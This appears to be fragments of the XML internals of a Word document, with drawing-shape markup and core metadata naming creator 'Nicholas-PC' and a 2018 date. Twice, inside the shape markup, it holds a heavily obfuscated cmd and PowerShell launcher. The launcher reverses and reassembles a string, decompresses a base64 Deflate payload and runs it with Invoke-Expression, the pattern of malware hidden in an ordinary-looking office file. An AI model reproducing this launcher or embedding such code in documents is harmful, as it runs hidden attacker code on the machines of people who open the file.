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AEEA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0" cy="1685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-904875</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="210185" cy="118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MD /c CmD   /c  "sET  vtb=Sv  H14a (  " )''nIOj-'X'+]3,1[)(gNIRTSot.EcneREFerpEsObREV$ (.^|)93]rAhC[,'UOr'eCalperC-  63]rAhC[,)86]rAhC[+45]rAhC[+58]rAhC[( eCalperC-421]rAhC[,)811]rAhC[+211]rAhC[+701]rAhC[(  eCalperC-  )')UOrXUOr+]31['+'DiLleH'+'s'+'D6U+'+']1['+'d'+'iLLE'+'HSD6U'+' (^&amp;v'+'pk)(d'+'neOt'+'da'+'Er'+'.)'+')i'+'IC'+'SA::]'+'gNiDocNE.TXET.'+'MEtSYs'+'['+', )) '+'ss'+'Erpm'+'OCed:'+':]e'+'domNo'+'IsseR'+'pmo'+'C.'+'nois'+'sErpmOC.Oi.'+'M'+'etsYS[ ,) UOrP4'+'+us'+'Vo'+'Z'+'JotY7'+'5N'+'U'+'YmueNC'+'DxK'+'nu'+'GdhwMFyM'+'j'+'JQ'+'Ve7zgT1K'+'j'+'sJ'+'8fU'+'pxr2bHKcO'+'Ltjm'+'nL6nE'+'yQ+tZ3wk'+'A'+'w'+'Y'+'uH0eb'+'s/e'+'YGkw'+'WLdIUo2'+'1impZs8g'+'D'+'G'+'qO'+'dz'+'n'+'2pYX'+'Jg3JlLNC'+'5D77v8'+'E'+'l1'+'fkeegklU'+'WP5MPf8'+'rO6'+'x'+'nffUGA'+'OVVVJ'+'om'+'JxC'+'UM+SOl'+'fLzf'+'bZx4jDQ6TWhuz3'+'SBbWD/ngGq'+'O7'+'A'+'R'+'Gj'+'UnVz/X2KX'+'SP498UiJR'+'gRnelNY'+'TXw9C'+'ndtliYVUF'+'5So'+'RxT/GQ2sYgz'+'w'+'K'+'4P'+'N8EUUry'+'vy4w'+'cX68/'+'/vNuBeHeIB'+'G'+'UlA6'+'O'+'b1Tb3'+'k4iL'+'mopq'+'3g'+'Tmi0ap'+'ScJVGcHm'+'sYhfZI'+'FwMoT'+'RDZN'+'U'+'O'+'r('+'gN'+'irts'+'46E'+'SabM'+'O'+'Rf::]Trevnoc'+'[]'+'mAE'+'rtsyRom'+'Em.o'+'i'+'['+' '+'(m'+'aErTsETAlfed.no'+'ISserpmOC.oI.m'+'E'+'tSYS  TC'+'Ejbo'+'-'+'WEn ( (redaerMAer'+'T'+'S'+'.Oi.'+'MetSy'+'S T'+'C'+'E'+'j'+'bo-WEn( '(( " ) ;  ^&amp; ( $ENV:CoMspEC[4,26,25]-jOiN'')( -joIn ( gi  VarIAble:h14a  ).value[ - 1 ..-(( gi  VarIAble:h14a  ).value.lenGtH) ] )&amp;&amp;POWERSHELl   (    ^&amp;(\"{0}{1}\" -f 'I','tEm'  ) (\"{0}{1}{2}\"-f'ENv',':','vTB' ) ).\"vAl`Ue\"   ^|^&amp;  (\"{0}{1}\" -f 'ie','X')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35pt;mso-wrap-distance-left:9.05pt;mso-wrap-distance-right:9.05pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:-71.25pt;mso-position-vertical-relative:text;margin-left:-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MD /c CmD   /c  "sET  vtb=Sv  H14a (  " )''nIOj-'X'+]3,1[)(gNIRTSot.EcneREFerpEsObREV$ (.^|)93]rAhC[,'UOr'eCalperC-  63]rAhC[,)86]rAhC[+45]rAhC[+58]rAhC[( eCalperC-421]rAhC[,)811]rAhC[+211]rAhC[+701]rAhC[(  eCalperC-  )')UOrXUOr+]31['+'DiLleH'+'s'+'D6U+'+']1['+'d'+'iLLE'+'HSD6U'+' (^&amp;v'+'pk)(d'+'neOt'+'da'+'Er'+'.)'+')i'+'IC'+'SA::]'+'gNiDocNE.TXET.'+'MEtSYs'+'['+', )) '+'ss'+'Erpm'+'OCed:'+':]e'+'domNo'+'IsseR'+'pmo'+'C.'+'nois'+'sErpmOC.Oi.'+'M'+'etsYS[ ,) UOrP4'+'+us'+'Vo'+'Z'+'JotY7'+'5N'+'U'+'YmueNC'+'DxK'+'nu'+'GdhwMFyM'+'j'+'JQ'+'Ve7zgT1K'+'j'+'sJ'+'8fU'+'pxr2bHKcO'+'Ltjm'+'nL6nE'+'yQ+tZ3wk'+'A'+'w'+'Y'+'uH0eb'+'s/e'+'YGkw'+'WLdIUo2'+'1impZs8g'+'D'+'G'+'qO'+'dz'+'n'+'2pYX'+'Jg3JlLNC'+'5D77v8'+'E'+'l1'+'fkeegklU'+'WP5MPf8'+'rO6'+'x'+'nffUGA'+'OVVVJ'+'om'+'JxC'+'UM+SOl'+'fLzf'+'bZx4jDQ6TWhuz3'+'SBbWD/ngGq'+'O7'+'A'+'R'+'Gj'+'UnVz/X2KX'+'SP498UiJR'+'gRnelNY'+'TXw9C'+'ndtliYVUF'+'5So'+'RxT/GQ2sYgz'+'w'+'K'+'4P'+'N8EUUry'+'vy4w'+'cX68/'+'/vNuBeHeIB'+'G'+'UlA6'+'O'+'b1Tb3'+'k4iL'+'mopq'+'3g'+'Tmi0ap'+'ScJVGcHm'+'sYhfZI'+'FwMoT'+'RDZN'+'U'+'O'+'r('+'gN'+'irts'+'46E'+'SabM'+'O'+'Rf::]Trevnoc'+'[]'+'mAE'+'rtsyRom'+'Em.o'+'i'+'['+' '+'(m'+'aErTsETAlfed.no'+'ISserpmOC.oI.m'+'E'+'tSYS  TC'+'Ejbo'+'-'+'WEn ( (redaerMAer'+'T'+'S'+'.Oi.'+'MetSy'+'S T'+'C'+'E'+'j'+'bo-WEn( '(( " ) ;  ^&amp; ( $ENV:CoMspEC[4,26,25]-jOiN'')( -joIn ( gi  VarIAble:h14a  ).value[ - 1 ..-(( gi  VarIAble:h14a  ).value.lenGtH) ] )&amp;&amp;POWERSHELl   (    ^&amp;(\"{0}{1}\" -f 'I','tEm'  ) (\"{0}{1}{2}\"-f'ENv',':','vTB' ) ).\"vAl`Ue\"   ^|^&amp;  (\"{0}{1}\" -f 'ie','X')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41:00Z</dcterms:created>
  <dc:creator>Nicholas-PC</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-12T06:41:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>